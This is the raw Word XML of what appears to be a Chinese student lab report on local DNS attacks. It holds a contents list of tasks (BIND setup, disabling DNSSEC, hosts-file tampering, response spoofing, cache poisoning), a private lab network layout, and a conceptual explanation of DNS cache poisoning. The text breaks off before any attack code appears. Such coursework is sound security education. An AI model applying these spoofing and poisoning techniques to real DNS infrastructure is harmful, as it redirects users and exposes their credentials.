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0B" w14:textId="77777777" w:rsidR="00852133" w:rsidRDefault="00852133" w:rsidP="00852133">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk42808439"/>
      <w:bookmarkStart w:id="1" w:name="_Hlk38306989"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="24A969CD" w14:textId="77777777" w:rsidR="00852133" w:rsidRDefault="00852133" w:rsidP="00852133">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012EAD">
        <w:rPr>
          <w:rFonts w:ascii="华文楷体" w:eastAsia="华文楷体" w:hAnsi="华文楷体"/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E9796CD" wp14:editId="488124EB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5C" w14:textId="23DE0404" w:rsidR="00852133" w:rsidRDefault="00852133" w:rsidP="00852133">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Hlk38307746"/>
    </w:p>
    <w:p w14:paraId="174CC953" w14:textId="77777777" w:rsidR="00A556B1" w:rsidRDefault="00A556B1" w:rsidP="00852133">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0264664E" w14:textId="60199346" w:rsidR="00554530" w:rsidRPr="00EC3F25" w:rsidRDefault="00EC3F25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EC3F25">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">Local DNS </w:t>
      </w:r>
      <w:r w:rsidR="000C114A" w:rsidRPr="00EC3F25">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C62F5C0" w14:textId="2F7DA65F" w:rsidR="00852133" w:rsidRPr="00554530" w:rsidRDefault="00852133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554530">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="1B7A8A7D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223118B0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508CEABC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tbl>
      <w:tblPr>
        <w:tblW w:w="6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4671"/>
      </w:tblGrid>
      <w:tr w:rsidR="00852133" w14:paraId="6AD0F96D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915FD1F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671" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B9C6B65" w14:textId="1A3D81DE" w:rsidR="00852133" w:rsidRDefault="00A3440D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maybeLocal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host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00852133" w14:paraId="695C79E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DFDAEA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671" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38211CD9" w14:textId="503CDB89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2A50238B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1BBCD72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671" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3695C26A" w14:textId="49BEEFA2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0FBC307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5F704677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671" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="714C1B32" w14:textId="3CFC040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62FBAA0F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19B52D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671" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EC4E7C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852133" w14:paraId="6F4BE7C0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BB7DE48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671" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07D77263" w14:textId="2A3CF33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0.1</w:t>
            </w:r>
            <w:r w:rsidR="00871047">
              <w:rPr>
                <w:rFonts w:ascii="华文楷体" w:eastAsia="华文楷体" w:hAnsi="华文楷体"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="1"/>
    </w:tbl>
    <w:p w14:paraId="2A29A881" w14:textId="1E14135B" w:rsidR="00554530" w:rsidRPr="00A556B1" w:rsidRDefault="00554530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73B46FCA" w14:textId="6C318972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6429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F309A" w14:textId="674FB6B0" w:rsidR="009B4FD0" w:rsidRDefault="009B4FD0" w:rsidP="009B4FD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688661A" w14:textId="45727FA3" w:rsidR="00EA57C7" w:rsidRDefault="009B4F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9527" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>一、实验简介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27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69C1DE4A" w14:textId="518718D7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28" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 实验背景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28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4D79BDFC" w14:textId="556F7D19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29" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 实验目的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29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527A451C" w14:textId="1073AB90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0" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3 实验内容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0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37BA37D6" w14:textId="708438B6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1" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4 实验环境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1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7DFCDF76" w14:textId="2C586ECD" w:rsidR="00EA57C7" w:rsidRDefault="00A80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2" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>二、实验原理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2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2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6915A016" w14:textId="1CE72620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3" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 DNS缓存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3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2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7DAB4D52" w14:textId="40401D09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4" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 DNS缓存中毒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4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2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2FC2411F" w14:textId="72FECD33" w:rsidR="00EA57C7" w:rsidRDefault="00A80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5" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>三、实验过程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5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3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4A48FF54" w14:textId="58D08A10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6" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Task1：配置用户计算机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6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3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6D7814C7" w14:textId="5DCA1142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7" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 Task2：设置本地DNS服务器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7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4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32C1F946" w14:textId="53CB046F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8" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1 Task2.1：配置BIND 9服务器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8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4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5684CA52" w14:textId="7DAAEB81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39" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2 Task2.2：关闭DNSSEC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39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4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3F52881A" w14:textId="71012EA6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0" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.3 Task2.3：启动DNS服务器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0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5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5C3C1EE4" w14:textId="7FDB0401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1" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.4 Task2.4：使用DNS服务器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1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5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0979FBAE" w14:textId="73F318EF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2" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3 Task3：在本地DNS服务器中托管区域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2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5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27B8F670" w14:textId="23DBD516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3" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.1 Task3.1：创建区域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3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6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7DD2F150" w14:textId="2F0848BE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4" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.2 Task3.2：设置正向查找区域文件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4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6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208086F8" w14:textId="5995D50A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5" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.3 Task3.3：设置反向查找区域文件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5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6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7DC6AA23" w14:textId="72DD69B1" w:rsidR="00EA57C7" w:rsidRDefault="00A80F0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6" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.4 Task3.4：重新启动BIND服务器并进行测试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6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7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4979FCF2" w14:textId="528013D6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7" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4 Task4：修改主机文件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7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8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67E9B00C" w14:textId="26D850B5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8" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5 Task5：直接欺骗用户响应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8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8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0B1397ED" w14:textId="49078F17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49" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6 Task6：DNS缓存中毒攻击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49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9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09B8113A" w14:textId="795F8099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50" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.7 Task7：DNS缓存中毒：定位到“权限”部分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50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0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7579A566" w14:textId="18F8B452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51" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.8 Task8：定位另一个域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51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2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56CB3742" w14:textId="2D2FDBE2" w:rsidR="00EA57C7" w:rsidRDefault="00A80F0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52" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.9 Task9：定位附加部分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52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3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4D13CCE5" w14:textId="1F16B768" w:rsidR="00EA57C7" w:rsidRDefault="00A80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53" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>四、实验结果与结论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53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5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0BA858F1" w14:textId="5F06FF6E" w:rsidR="00EA57C7" w:rsidRDefault="00A80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29554" w:history="1">
            <w:r w:rsidR="00EA57C7" w:rsidRPr="00C773A3">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>五、参考文献</w:t>
            </w:r>
            <w:r w:rsidR="00EA57C7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EA57C7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EA57C7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc58529554 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EA57C7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EA57C7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F60A6B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00EA57C7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5ECD5065" w14:textId="089A24D5" w:rsidR="009B4FD0" w:rsidRPr="00EA57C7" w:rsidRDefault="009B4FD0" w:rsidP="00EA57C7">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:sectPr w:rsidR="009B4FD0" w:rsidRPr="00EA57C7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0A5BF3" w14:textId="1EDB312F" w:rsidR="00852133" w:rsidRDefault="00852133" w:rsidP="00554530">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc58529527"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>一、实验</w:t>
      </w:r>
      <w:r w:rsidR="00CD4C02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简介</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="35A81DB8" w14:textId="2ABDAF46" w:rsidR="00CD4C02" w:rsidRPr="00CD4C02" w:rsidRDefault="00CD4C02" w:rsidP="00CD4C02">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc58529528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实验背景</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="3DEDCFC1" w14:textId="1787D95C" w:rsidR="000C114A" w:rsidRPr="000C114A" w:rsidRDefault="00EC3F25" w:rsidP="00871047">
      <w:r w:rsidRPr="00EC3F25">
        <w:t>DNS（域名系统）是互联网的电话簿；它将主机名转换为IP地址（反之亦然）。这种转换是通过DNS解析完成的，该解析发生在幕后。DNS攻击以各种方式操纵此解析过程，目的是将用户误导到通常是恶意的替代目标。本实验的目的是了解此类攻击的工作方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC0542A" w14:textId="56072ED6" w:rsidR="00CD4C02" w:rsidRDefault="00CD4C02" w:rsidP="00CD4C02">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc5852952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目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="45FBE63A" w14:textId="0D17C19C" w:rsidR="00EF42BD" w:rsidRPr="00EF42BD" w:rsidRDefault="00871047" w:rsidP="00EF42BD">
      <w:r w:rsidRPr="00871047">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在本实验中，</w:t>
      </w:r>
      <w:r w:rsidR="00EC3F25" w:rsidRPr="00EC3F25">
        <w:t>学生将首先设置和配置DNS服务器，然后他们还将在实验室环境内对目标进行各种DNS攻击</w:t>
      </w:r>
      <w:r w:rsidR="00EC3F25">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE6EF90" w14:textId="7FCE6AE1" w:rsidR="00EF42BD" w:rsidRDefault="00CD4C02" w:rsidP="00EF42BD">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc58529530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内容</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="1458F3A9" w14:textId="77777777" w:rsidR="00EF42BD" w:rsidRDefault="00EF42BD" w:rsidP="00EF42BD">
      <w:r w:rsidRPr="00EF42BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本实验涵盖以下主题：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D14284" w14:textId="1BB0A452" w:rsidR="001B1D5E" w:rsidRPr="001B1D5E" w:rsidRDefault="001B1D5E" w:rsidP="001B1D5E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1B1D5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1D5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>及其运作方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E11FF7C" w14:textId="41F946A0" w:rsidR="001B1D5E" w:rsidRPr="001B1D5E" w:rsidRDefault="001B1D5E" w:rsidP="001B1D5E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1B1D5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1D5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>服务器设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C1F296" w14:textId="5C6CF943" w:rsidR="001B1D5E" w:rsidRPr="001B1D5E" w:rsidRDefault="001B1D5E" w:rsidP="001B1D5E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1B1D5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1D5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>缓存中毒攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FCC6BC" w14:textId="24A49AA9" w:rsidR="001B1D5E" w:rsidRPr="001B1D5E" w:rsidRDefault="001B1D5E" w:rsidP="001B1D5E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1B1D5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>欺骗</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1D5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1D5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>响应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA4C97" w14:textId="26C5FF6D" w:rsidR="001B1D5E" w:rsidRPr="001B1D5E" w:rsidRDefault="001B1D5E" w:rsidP="001B1D5E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1B1D5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>数据包嗅探和欺骗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55533692" w14:textId="46BDA712" w:rsidR="00871047" w:rsidRPr="001B1D5E" w:rsidRDefault="001B1D5E" w:rsidP="001B1D5E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1B1D5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scapy</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1D5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590CCBF6" w14:textId="0F40EE0C" w:rsidR="00CD4C02" w:rsidRDefault="00CD4C02" w:rsidP="00CD4C02">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc5852953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实验环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="26297573" w14:textId="7853946A" w:rsidR="00CD4C02" w:rsidRDefault="00CD4C02" w:rsidP="007D16C4">
      <w:pPr>
        <w:spacing w:before="180" w:after="180"/>
      </w:pPr>
      <w:r w:rsidRPr="00554530">
        <w:t xml:space="preserve">Ubuntu </w:t>
      </w:r>
      <w:r w:rsidR="009B4FD0">
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00554530">
        <w:t>.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C41CAA2" w14:textId="77777777" w:rsidR="00D8204C" w:rsidRPr="00D8204C" w:rsidRDefault="00BF58C9" w:rsidP="007D16C4">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:before="180" w:after="180"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8204C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8204C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>服务器：</w:t>
      </w:r>
      <w:r w:rsidR="00F60A6B" w:rsidRPr="00D8204C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>192.168.2.18</w:t>
      </w:r>
      <w:r w:rsidR="00522AD0" w:rsidRPr="00D8204C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D322278" w14:textId="77777777" w:rsidR="00D8204C" w:rsidRPr="00D8204C" w:rsidRDefault="00BF58C9" w:rsidP="007D16C4">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:before="180" w:after="180"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8204C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>用户机：</w:t>
      </w:r>
      <w:r w:rsidR="00F60A6B" w:rsidRPr="00D8204C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>192.168.2.191</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480B3BB8" w14:textId="33CD11D7" w:rsidR="00BF58C9" w:rsidRPr="00D8204C" w:rsidRDefault="00522AD0" w:rsidP="007D16C4">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:before="180" w:after="180"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8204C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击机：</w:t>
      </w:r>
      <w:r w:rsidR="00F60A6B" w:rsidRPr="00D8204C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>192.168.2.178</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E18393D" w14:textId="75FD8735" w:rsidR="0081297F" w:rsidRDefault="0081297F" w:rsidP="00554530">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc58529532"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、实验</w:t>
      </w:r>
      <w:r w:rsidR="00CD4C02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="7CD76132" w14:textId="1A194F60" w:rsidR="00C76674" w:rsidRDefault="00D86BC3" w:rsidP="00D86BC3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc5852953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DNS缓存</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="5806C514" w14:textId="0B2E3127" w:rsidR="00D86BC3" w:rsidRDefault="00D86BC3" w:rsidP="00D86BC3">
      <w:r>
        <w:t>DNS是IP地址和域名的全球目录。DNS缓存是将这些地址存储在世界各地的DNS服务器中的系统。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了保持您的</w:t>
      </w:r>
      <w:r>
        <w:t>DNS请求快速，原始开发人员创建了一个分布式DNS系统。每个服务器都存储一个它知道的DNS记录列表–这称为缓存。如果离</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们</w:t>
      </w:r>
      <w:r>
        <w:t>最近的DNS服务器不知道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们</w:t>
      </w:r>
      <w:r>
        <w:t>需要的IP地址，它将询问其他DNS服务器，直到找到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们</w:t>
      </w:r>
      <w:r>
        <w:t>要访问的网站的IP地址。然后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们</w:t>
      </w:r>
      <w:r>
        <w:t>的DNS服务器将该新条目保存到缓存中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644882C5" w14:textId="6E389FB8" w:rsidR="00D86BC3" w:rsidRDefault="00D86BC3" w:rsidP="00D86BC3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc5852953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DNS缓存中毒</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="717D795B" w14:textId="237B2440" w:rsidR="00D86BC3" w:rsidRDefault="00D86BC3" w:rsidP="00D86BC3">
      <w:r w:rsidRPr="00D86BC3">
        <w:t>DNS缓存中毒是一种网络攻击，它使您的计算机误以为它会到达正确的地址，但事实并非如此。攻击者使用DNS缓存中毒来劫持互联网流量并窃取用户凭据或个人数据。DNS缓存中毒攻击也称为DNS欺骗，它试图诱骗用户将其私人数据输入不安全的网站。</w:t>
      </w:r>
      <w:r>
        <w:t>DNS缓存中毒通过欺骗DNS服务器保存伪造的DNS条目来起作用。伪造的DNS条目的流量流向选择窃取数据的攻击者的服务器。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般攻击过程如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522E2F25" w14:textId="77777777" w:rsidR="00D86BC3" w:rsidRPr="00D86BC3" w:rsidRDefault="00D86BC3" w:rsidP="00D86BC3">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
